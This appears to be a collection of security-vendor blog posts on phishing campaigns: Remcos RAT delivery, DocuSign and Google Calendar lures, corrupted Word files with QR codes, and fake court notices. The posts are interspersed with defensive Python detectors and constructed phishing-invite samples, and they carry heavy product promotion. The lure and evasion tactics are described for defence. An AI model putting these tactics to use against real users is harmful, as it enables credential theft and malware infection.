AI tools can also be used to assess online interactions by a particular individual to find out topics the individual is likely to respond to. They can rapidly ingest large amounts of data to craft phishing lures closely mimicking the style of emails written by a particular company or individual, making the spoofing almost impossible for individuals to distinguish from genuine communications. With the tools to gather a wealth of personal information and create flawless emails on appropriate topics, business email compromise scams have become much easier and can be conducted by a broader range of cybercriminals. The consequences of falling for one of these scams can be severe.

To combat these advanced phishing campaigns, businesses need advanced defenses. It is important to ensure that all members of the workforce receive ongoing security awareness training, including the C-suite as they are often the people being targeted in these campaigns. However, given the quality of these phishing attempts, security awareness training and a standard spam filter appliance will not cut it. For many years, spam filters have relied on blacklists of IP addresses and domains that have been previously identified as malicious or have low trust scores, along with antivirus engines for malware detection, and scans of message content for phrases commonly associated with spam and phishing. These spam filters will catch the majority of spam and bulk phishing emails, but will not detect the more sophisticated, AI-generated threats.

Advanced email security solutions are now a necessity. The latest anti-spam software and cloud-based anti-spam services incorporate AI and machine learning-based detection in addition to the standard spam filtering methods, such as the engine at the heart of TitanHQ’s SpamTitan and PhishTitan M365 anti-phishing solutions. In recent independent tests by VirusBulletin, TitanHQ’s SpamTitan Skellig engine scored joint first place for detection in the Q3 2024 tests and first place in Q4, achieving a 100% phishing detection rate with a 0.00% false positive rate and a 100% malware catch rate. Whether you are a business looking to improve your defenses or a managed service provider looking to provide more advanced security to your clients, give the TitanHQ team a call to find out more about getting the right tools in place to counter these advanced phishing threats.

Remcos RAT Infections on the Rise as Threat Actors Adopt New Phishing Tactics

Detections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new tactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive data.

The Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two main variants delivered using distinct methods. One of the variants is distributed in phishing emails using Microsoft Office Open XML attachments that exploit a Microsoft Office memory corruption remote code execution vulnerability (CVE-2017-11882) to execute an embedded script that downloads an intermediate payload, which in turn delivers the Remcos RAT. The vulnerability does not affect newer Office versions, such as Microsoft 365, only older versions prior to Office 2016.

Lures commonly used include fake purchase orders, where the email claims to include purchasing specifications in the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected and to enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA file, triggering the processes that lead to the installation of the Remcos RAT. When delivered, the Remcos RAT is injected into a legitimate Windows executable (RegAsm.exe).

The second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote server and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the malware is often not detected by security solutions. Once installed, persistence is maintained via registry modifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include payment confirmations, with details included in the attached DOCX file.
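Both variants end with code injected into RegAsm.exe, a legitimate .NET utility that is rarely launched by an Office application, an HTA host or a script interpreter, and the page notes that persistence is set through registry modifications. As an added example (not code from the page or from TitanHQ), the Python below walks constructed process-creation and registry events, flags any RegAsm.exe whose ancestry includes an Office, mshta, wscript/cscript or PowerShell process, and records Run-key writes by that process. The JSON event schema (type, pid, ppid, image, key) and the devenv.exe path are assumptions for the sample; the ancestor list is a starting point a team would tune.

```python
import json

# Ancestors that should not normally be spawning RegAsm.exe (assumed tuning list).
OFFICE_AND_SCRIPT_HOSTS = {
    "winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
    "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
}
INJECTION_TARGETS = {"regasm.exe"}
RUN_KEYS = ("\\currentversion\\run", "\\currentversion\\runonce")

# Constructed events in an assumed EDR-style JSON schema (not real telemetry).
# Chains 100->200->300 and 400->500->600 mirror the two delivery paths described
# above; 700->800 is an assumed benign build-tool launch for contrast.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 100, "ppid": 1, "image": "C:\\Program Files\\Microsoft Office\\EXCEL.EXE"},
    {"type": "process", "pid": 200, "ppid": 100, "image": "C:\\Windows\\System32\\mshta.exe"},
    {"type": "process", "pid": 300, "ppid": 200, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"},
    {"type": "registry", "pid": 300, "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"type": "process", "pid": 400, "ppid": 1, "image": "C:\\Windows\\System32\\wscript.exe"},
    {"type": "process", "pid": 500, "ppid": 400, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"type": "process", "pid": 600, "ppid": 500, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"},
    {"type": "process", "pid": 700, "ppid": 1, "image": "C:\\Program Files\\Microsoft Visual Studio\\devenv.exe"},
    {"type": "process", "pid": 800, "ppid": 700, "image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]

def basename(image: str) -> str:
    """Lower-cased file name of an image path, tolerating either slash style."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect_regasm_abuse(lines: list[str]) -> list[dict]:
    """Return one finding per RegAsm.exe with a suspicious ancestor chain."""
    procs, reg_writes = {}, {}
    for line in lines:
        e = json.loads(line)
        if e["type"] == "process":
            procs[e["pid"]] = e
        elif e["type"] == "registry":
            reg_writes.setdefault(e["pid"], []).append(e["key"])

    findings = []
    for e in procs.values():
        if basename(e["image"]) not in INJECTION_TARGETS:
            continue
        # Walk up the parent chain; the seen-set guards against pid reuse loops.
        chain, cur, seen = [basename(e["image"])], procs.get(e["ppid"]), set()
        while cur and cur["pid"] not in seen:
            seen.add(cur["pid"])
            chain.append(basename(cur["image"]))
            cur = procs.get(cur["ppid"])
        triggers = [p for p in chain[1:] if p in OFFICE_AND_SCRIPT_HOSTS]
        if not triggers:
            continue
        persistence = [k for k in reg_writes.get(e["pid"], [])
                       if any(r in k.lower() for r in RUN_KEYS)]
        findings.append({"pid": e["pid"], "chain": chain,
                         "triggers": triggers, "run_key_writes": persistence})
    return findings

if __name__ == "__main__":
    for f in detect_regasm_abuse(SAMPLE_LINES):
        print(f["pid"], " <- ".join(f["chain"]), f["run_key_writes"])
```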

The highest number of infections has occurred in the United States and India, and there has been a sharp rise in infections in recent months, showing that the campaigns are proving effective. A combination of technical measures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such as this show why it is important to stay on top of patching, ensure that all systems are kept up to date, and migrate from software that has reached end-of-life to supported software versions. Endpoint security software is important; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.

The primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an ideal choice as it includes reputation checks, SPF, DKIM, and DMARC checks, machine-learning algorithms to identify anomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern filtering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested email security solutions, with a 100% malware and phishing catch rate.

It is important to keep the workforce up to date on the latest security threats and to teach and reinforce security best practices. The SafeTitan security awareness training platform makes this easy for businesses and MSPs, allowing effective security awareness training programs to be created that are tailored to individuals and user roles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the SafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit from the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect Microsoft 365 environments from the advanced threats that Microsoft fails to block, adds banners to emails from external sources, and helps security teams rapidly mitigate phishing threats.

DocuSign Phishing Campaign Abuses HubSpot Tools to Attack European Businesses

An ongoing large-scale phishing campaign targets European businesses and attempts to obtain credentials for their Microsoft Azure cloud infrastructure. While businesses in multiple sectors have been attacked, the majority are in the automotive, chemical, and industrial manufacturing sectors. According to an analysis of the campaign by the Unit 42 team, this campaign has targeted at least 20,000 businesses in Europe.

Like many current phishing campaigns targeting companies, the campaign uses DocuSign-themed lures, where the user is asked to review an emailed document, which includes the branding of the company being targeted. If the document is opened, the user is directed via embedded hyperlinks to an online form created using HubSpot’s free online form builder tool. The drag-and-drop form builder allows forms to be created quickly, and in this case, the threat actor has used the free-to-use tool to create a form with a link button to view the document on Microsoft’s secured cloud.

If the button is clicked, the user will be directed to a phishing page that mimics the Office 365 Outlook Web App login page. If credentials are entered in the fake login page – commonly hosted on attacker-controlled .buzz domains – they are captured by the threat actor, who will attempt to log in, and then pivot and move laterally to the cloud. A successful login will see the threat actor add a new device to the victim’s account for persistence.

There are several measures that can be taken by businesses to protect against phishing campaigns such as this, starting with an email spam filter to block the initial contact via email. SpamTitan is an advanced cloud-based anti-spam service for blocking email phishing and malware threats. The solution checks inbound messages against up-to-the-minute lists of blacklisted domains, performs SPF, DKIM, and DMARC checks, malware scans, and assessments of message headers and content for phishing indicators, and incorporates AI and machine learning algorithms to identify anomalies in message content. Email sandboxing is used to subject messages to in-depth analysis to identify zero-day threats. In recent independent testing by VirusBulletin, SpamTitan achieved first place for overall score out of 11 leading email security solutions, blocking 100% of phishing attempts, 100% of malware, and 99.998% of spam email, with a 0.00% false positive rate.

Security awareness training is vital to teach security best practices and make employees aware of threats, including email threats that abuse legitimate services and tools. TitanHQ’s SafeTitan platform allows businesses to quickly create and automate security awareness training programs, tailored for departments, user groups, and individuals, and reinforce training through phishing simulations. An additional recommended protection is the WebTitan DNS-based web filter, which incorporates URL filtering to prevent users from visiting known malicious websites, along with controls to prevent users from downloading malware.

For more information on improving your defenses against phishing, give the TitanHQ team a call today. The full TitanHQ suite of cybersecurity solutions is available on a free trial, with full product support provided throughout the trial.

Google Calendar Abused in Phishing Campaign

Companies in multiple sectors are being targeted in an ongoing phishing campaign in which initial contact is made by email using Google Calendar-generated meeting invites. This campaign has proven effective, especially when the user recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these phishing emails identified each week, according to Check Point.

The aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file attachment (.ics), both of which will send the user to either Google Forms or Google Drawings. Next, the user is tricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the user to the scam page, where they will be taken through a fake authentication process that captures personal information, and ultimately payment card information. This campaign could easily be adapted to obtain credentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted credentials.

An attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look exactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the phishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and trusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.

Depending on the user’s settings, these invites may be automatically added to the user’s calendar. The threat actor can then trigger a second email by canceling the meeting, and has been doing so in this campaign. The cancellation email also includes a hyperlink to a malicious website.

The use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of requests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than 500 million active users of the tool.

There are simple steps to take to block these threats, although the first option will also limit legitimate functionality for genuine invites. To block these attempts, go into Google Calendar settings and, in the event settings, switch from “automatically add invitations” to “only show invitations I have responded to”. Also, access Gmail settings and uncheck “automatically add events from Gmail to my calendar”. To avoid disabling the functionality, check the “only known individuals” setting in Google Calendar, which will generate an alert if the user has had no interactions with an individual in the past.
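The same "known individual" logic can be applied by a mail filter to the .ics attachment itself, since the invite passes SPF, DKIM and DMARC and the link is the only thing that gives it away. As an added example (not code from the page, from Google or from TitanHQ), the Python below unfolds a constructed RFC 5545 invite, extracts the organizer and every URL in the description, location and URL properties, and marks a link-bearing request or cancellation from an organizer the user has never dealt with for review. The invite text, the known-contacts set and the placeholder form id are constructed; the parser deliberately ignores property parameters such as CN=.

```python
import re
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s<>\"']+")

# Constructed invite (not a sample from the campaign). The DESCRIPTION is folded
# in the middle of the URL, as RFC 5545 allows, so a grep of the raw file would
# only ever see a truncated link.
SAMPLE_INVITE = (
    "BEGIN:VCALENDAR\r\n"
    "METHOD:REQUEST\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:constructed-invite-1\r\n"
    "ORGANIZER;CN=Support Desk:mailto:organizer@unknown-sender.example\r\n"
    "ATTENDEE;CN=Alice:mailto:alice@corp.example\r\n"
    "SUMMARY:Account review\r\n"
    "DESCRIPTION:Confirm your attendance here: https://docs.google.com/forms/d/e/\r\n"
    " PLACEHOLDER-FORM-ID/viewform\r\n"
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

def unfold(ics: str) -> list[str]:
    """Join folded continuation lines (those beginning with a space or tab)."""
    lines: list[str] = []
    for raw in ics.replace("\r\n", "\n").split("\n"):
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return [line for line in lines if line]

def parse_properties(ics: str) -> dict[str, list[str]]:
    """Map property name -> list of values, dropping ;parameters such as CN=...
    (simplification: a parameter value containing ':' is not handled)."""
    props: dict[str, list[str]] = {}
    for line in unfold(ics):
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        name = head.split(";", 1)[0].upper()
        props.setdefault(name, []).append(value)
    return props

def analyze_invite(ics: str, known_contacts: set[str]) -> dict:
    """Summarize who sent the invite, where its links lead, and whether to hold it."""
    props = parse_properties(ics)
    organizer = props.get("ORGANIZER", [""])[0].removeprefix("mailto:").lower()
    text = " ".join(props.get("DESCRIPTION", []) + props.get("LOCATION", []) + props.get("URL", []))
    urls = URL_RE.findall(text)
    hosts = sorted({urlparse(u).hostname or "" for u in urls})
    organizer_known = organizer in known_contacts
    # A link-bearing request or cancellation from an organizer the user has never
    # interacted with is what the "only known individuals" setting would alert on.
    verdict = "ok" if organizer_known or not urls else "review"
    return {"method": props.get("METHOD", [""])[0], "organizer": organizer,
            "organizer_known": organizer_known, "urls": urls, "hosts": hosts,
            "verdict": verdict}

if __name__ == "__main__":
    print(analyze_invite(SAMPLE_INVITE, {"bob@corp.example"}))
```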

It is important to have an advanced email security solution that is capable of detecting sophisticated phishing attacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF, DKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can detect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email sandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check the destination URL. While this campaign does not use malware, an email filtering service with email sandboxing will also protect against malware threats.
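The two points above, that a Google Calendar invite passes SPF, DKIM and DMARC because Google really did send it, and that a filter therefore has to look at the invite itself rather than at sender reputation, can be shown with a small triage routine. The following is an added example, not TitanHQ or SpamTitan code: it parses a raw invitation email, confirms the authentication results passed, and then flags the invite when the organizer is someone the mailbox has never corresponded with (the same idea as the “only known individuals” setting) or when the event description links to a domain unrelated to the organizer. The contact list and both sample messages are constructed.

```python
"""Triage calendar invites that pass SPF/DKIM/DMARC but come from strangers.

Added example (not TitanHQ code). Assumption: a mail gateway hands us the raw
RFC 5322 message and a set of addresses this mailbox has exchanged mail with.
Both sample messages below are constructed for the example.
"""
import re
from email import message_from_bytes, policy
from urllib.parse import urlparse

# Constructed contact history for the protected mailbox.
KNOWN_CONTACTS = {"alice@example.com", "bob@partner.example"}

URL_RE = re.compile(r"https?://[^\s<>\"']+")


def parse_ics(text: str) -> dict:
    """Return the iCalendar properties as a dict (first occurrence wins).

    RFC 5545 folds long lines; a continuation line starts with a space or tab,
    so those breaks are removed before splitting NAME[;PARAMS]:VALUE lines."""
    unfolded = re.sub(r"\r?\n[ \t]", "", text)
    props = {}
    for line in unfolded.splitlines():
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        props.setdefault(name.split(";", 1)[0].upper(), value.strip())
    return props


def triage_invite(raw: bytes, known_contacts=KNOWN_CONTACTS) -> dict:
    """Decide whether an invitation email is delivered or sent to the sandbox."""
    msg = message_from_bytes(raw, policy=policy.default)
    auth = (msg.get("Authentication-Results") or "").lower()
    auth_pass = all(f"{m}=pass" in auth for m in ("spf", "dkim", "dmarc"))
    findings = []
    for part in msg.walk():
        fname = (part.get_filename() or "").lower()
        if part.get_content_type() != "text/calendar" and not fname.endswith(".ics"):
            continue
        payload = part.get_content()
        if isinstance(payload, bytes):
            payload = payload.decode("utf-8", "replace")
        props = parse_ics(payload)
        organizer = props.get("ORGANIZER", "").lower().replace("mailto:", "")
        method = props.get("METHOD", "?")
        # A REQUEST or CANCEL from someone we never wrote to is the page's scenario.
        if organizer and organizer not in known_contacts:
            findings.append(f"invite from unknown organizer {organizer} (METHOD={method})")
        org_domain = organizer.rpartition("@")[2]
        # Links in the event body that point away from the organizer's own domain.
        for field in ("DESCRIPTION", "LOCATION", "URL"):
            for url in URL_RE.findall(props.get(field, "")):
                host = (urlparse(url).hostname or "").lower()
                if org_domain and not host.endswith(org_domain):
                    findings.append(f"{field} links off-organizer domain: {host}")
    return {"auth_pass": auth_pass, "findings": findings,
            "verdict": "sandbox" if findings else "deliver"}


# Constructed sample: authentication passes because Google sent it, but the
# organizer is a stranger and the description links to a form.
SAMPLE_INVITE = b"""From: Google Calendar <calendar-notification@google.com>
To: victim@example.com
Subject: Invitation: Payment verification @ Mon Dec 2, 2024 (victim@example.com)
Authentication-Results: mx.example.com; spf=pass smtp.mailfrom=google.com; dkim=pass header.d=google.com; dmarc=pass header.from=google.com
Content-Type: text/calendar; charset="UTF-8"; method=REQUEST
MIME-Version: 1.0

BEGIN:VCALENDAR
METHOD:REQUEST
BEGIN:VEVENT
ORGANIZER;CN=Support Team:mailto:events.organizer@gmail.com
DESCRIPTION:Your payment requires verification. Open the form: https://docs.g
 oogle.com/forms/d/CONSTRUCTED-PLACEHOLDER
SUMMARY:Payment verification
END:VEVENT
END:VCALENDAR
"""

# Constructed sample: a genuine invite from a known colleague.
SAMPLE_BENIGN = b"""From: Alice <alice@example.com>
To: victim@example.com
Subject: Invitation: Weekly sync
Authentication-Results: mx.example.com; spf=pass; dkim=pass; dmarc=pass
Content-Type: text/calendar; method=REQUEST
MIME-Version: 1.0

BEGIN:VCALENDAR
METHOD:REQUEST
BEGIN:VEVENT
ORGANIZER:mailto:alice@example.com
SUMMARY:Weekly sync
END:VEVENT
END:VCALENDAR
"""

if __name__ == "__main__":
    print(triage_invite(SAMPLE_INVITE))
    print(triage_invite(SAMPLE_BENIGN))
```

The authentication result is recorded but deliberately not used as a reason to deliver: for this campaign it is always “pass”, so the decision rests on who the organizer is and where the event body points.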

Meeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are sent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam emails in security awareness training. Employees should be made aware that these requests may not be what they seem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees are to these types of scams using a phishing simulator. SafeTitan includes many phishing templates involving invites from legitimate services to allow businesses to incorporate these into their simulations.

Call TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security awareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft 365.

Threat Actors Adopt Corrupted Word Files for Phishing Campaigns

A new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word files to emails. The files themselves do not contain any malicious code, so scans of the attachments by email security solutions may not flag the emails as malicious.

In order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as employees will typically open these messages. The attached files have file names related to payments, annual benefits, and bonuses, which employees may open without performing standard checks of the email, such as identifying the true sender of the message. Many employees place a moderate amount of trust in Word files, because any macro a document contains should not run automatically when the document is opened.

The threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle corrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will be informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would like the file to be recovered. The documents have been crafted to ensure that they can be recovered by Word, and the recovery will present the user with a QR code that they are told they must scan to retrieve the document.

The document includes the logo of the company being targeted, and the user does not need to “enable editing” to view the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using their mobile device, they will be directed to a phishing page that is an exact match of the genuine Microsoft login prompt and asked to enter their Microsoft credentials.

Businesses with spam filter software may not be protected as email security solutions often fail to scan corrupted files. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who identified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not contain any content in the body of the email indicative of a phishing attempt.
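The reason these attachments slip past a macro- or signature-oriented scan is that there is nothing to match: the file is simply a broken container. A structural check catches that. The following is an added example, not code from TitanHQ or Any.Run: a .docx (and .xlsx, .pptx) is a ZIP archive with a known required entry, so an attachment that carries the ZIP signature but cannot be parsed, or lacks that entry, is exactly the “recoverable but corrupt” file this campaign relies on and is a candidate for quarantine or sandboxing. The sample document, the truncation used to corrupt it, and the lure vocabulary are constructed.

```python
"""Flag Office attachments that are structurally corrupt but 'recoverable'.

Added example (not TitanHQ or Any.Run code). Assumption: an attachment scanner
receives the file name and bytes. A .docx is a ZIP container; one that starts
with the PK signature but fails ZIP parsing, or lacks word/document.xml, is the
kind of attachment the campaign uses, and contains no macro to detect.
"""
import io
import zipfile

# Entry that must exist in a well-formed OOXML container of each type.
OOXML_REQUIRED = {
    ".docx": "word/document.xml",
    ".xlsx": "xl/workbook.xml",
    ".pptx": "ppt/presentation.xml",
}
# Constructed lure vocabulary, from the file-name themes the campaign used.
LURE_WORDS = ("payment", "benefit", "bonus", "salary", "payroll")


def build_docx(body_xml: str) -> bytes:
    """Create a minimal, well-formed .docx in memory (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", body_xml)
    return buf.getvalue()


def corrupt(data: bytes) -> bytes:
    """Drop the second half of the archive, which removes the central directory
    and end record. The PK header survives, so Word offers to recover the file."""
    return data[: len(data) // 2]


def classify_attachment(name: str, data: bytes) -> dict:
    """Return the file's structural verdict plus whether its name is a lure."""
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    result = {"name": name, "lure": any(w in name.lower() for w in LURE_WORDS)}
    if ext not in OOXML_REQUIRED:
        result["verdict"] = "not-office"
        return result
    if not data.startswith(b"PK"):
        result["verdict"] = "not-ooxml"  # extension does not match the content
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            damaged = z.testzip() is not None          # CRC check of every entry
            missing = OOXML_REQUIRED[ext] not in set(z.namelist())
            result["verdict"] = "corrupt-ooxml" if (damaged or missing) else "valid-ooxml"
    except zipfile.BadZipFile:
        result["verdict"] = "corrupt-ooxml"           # no usable central directory
    return result


def should_quarantine(result: dict) -> bool:
    """Corrupt or mislabelled Office files go to the sandbox regardless of
    whether they contain macros; a payroll-themed name on such a file is the
    pattern described for this campaign."""
    return result["verdict"] in ("corrupt-ooxml", "not-ooxml")


if __name__ == "__main__":
    good = build_docx("<w:document/>")
    for label, blob in (("intact", good), ("truncated", corrupt(good))):
        r = classify_attachment("Annual_Benefits_2024.docx", blob)
        print(label, r, "quarantine" if should_quarantine(r) else "deliver")
```

The check is cheap enough to run inline in a gateway, and it is the inverse of the usual logic: instead of asking whether the file contains something bad, it asks whether the file is even the thing its extension claims to be.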

If the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile phone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such as web filters will likely be bypassed.

Threat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it is important to run security awareness training programs continuously, updating the training content with new training material in response to threat actors’ changing tactics. By warning employees about this method, they should recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to do with a security awareness training platform such as SafeTitan. New training content can be quickly created and rolled out to all users as part of their monthly allocation of training modules. It is also easy to add this type of threat to the SafeTitan phishing simulator to test how employees respond to this new threat type.

As the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster your M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates seamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses. PhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag that these emails are not genuine: the HR department and payroll send from internal email addresses, so a message from them should never carry an external banner.

An email security solution with email sandboxing is also advisable for deep inspection of file attachments, including the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the business.

All of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.

Protect Your Business Against Holiday Season Cyber Threats

Holiday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now known. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city caused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day when retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how good many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the official day for the latter being the Monday after Black Friday – Cyber Monday.

The holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online shoppers looking to buy gifts for Christmas and pick up a bargain or two. Many people time major purchases to take advantage of Black Friday and Cyber Monday offers, and cybercriminals are poised to pounce on the unwary. The losses to scams over the holiday period are staggering. According to the Federal Bureau of Investigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is likely to be considerably higher since many losses go unreported. Those figures do not include the losses to phishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period. Ransomware attacks, for instance, surge over Thanksgiving weekend and Christmas, when IT staff are spread thin.

Given the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard, take extra care online, ensure that vendors are legitimate before handing over their card details, and double-check the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so do businesses. There are end-of-year deadlines to meet and it’s a short month, with many workers taking annual leave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat actors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially against phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to a costly cyberattack.

Businesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and conducting a security awareness training session is a good place to start. Employees should be reminded about the increase in malicious cyber activity over the holiday period and be reminded about the risks they may encounter online, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness training platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them about seasonal and other cyber threats. The training platform makes it quick and easy to create and automate training courses, with the training delivered in modules of no more than 10 minutes to ensure employees can maintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a phishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by phishing scams and ensure they receive the additional training they need.

Due to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that reliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge protection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates machine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual antivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3, VirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of 99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate, demonstrating the reliability of TitanHQ’s cloud-based email filtering solution.

TitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious websites, blocks malware downloads from the Internet, and can be used to control the web content employees can access, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a happy holiday period and above all else that you are well protected against cyber threats. Give the team a call today to find out more about how we can help protect your business this holiday season and beyond.

Phishing Campaign Targets Law Firms by Impersonating U.S. Federal Courts

A phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports to contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims to trick law firm employees into downloading malware that provides the threat actor with persistent access to the law firm’s network.

Threat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If a threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack all downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to store large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily monetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its clients.

Over the last few years, law firms have been extensively targeted by threat actors for this very reason. According to a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber incident, and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms have increased by 77% year-over-year. The main motivations for these attacks are extortion and ransomware. There has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically involved in large financial transactions that threat actors can try to divert to their own accounts.

One of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into installing malware. The campaign came to light following multiple complaints about fake notices of electronic court filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email notifications that purport to be notifications from the courts. The emails impersonate the PACER case management and electronic case files system, and instruct the recipient to respond immediately. The judiciary advised law firms to always check the federal judiciary’s official electronic filing system and never open attachments in emails or download files from unofficial sources.

The intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to access a document from a cloud-based repository. Clicking the link directs the user to a malicious website where they are prompted to download a file. Opening the file triggers the installation of malware that will give the threat actor the access they need for an extensive compromise. The campaign will undoubtedly result in the theft of sensitive data and attempted extortion.

Most law firms will be well aware that they are prime targets for threat actors and the importance of implementing robust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their networks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution – one that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. This is an area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide multiple layers of protection against the most common attack vectors.

The primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a cloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing hardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting malware and malicious code in email attachments, even zero-day malware threats. The solution has machine learning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect and block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000 emails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.

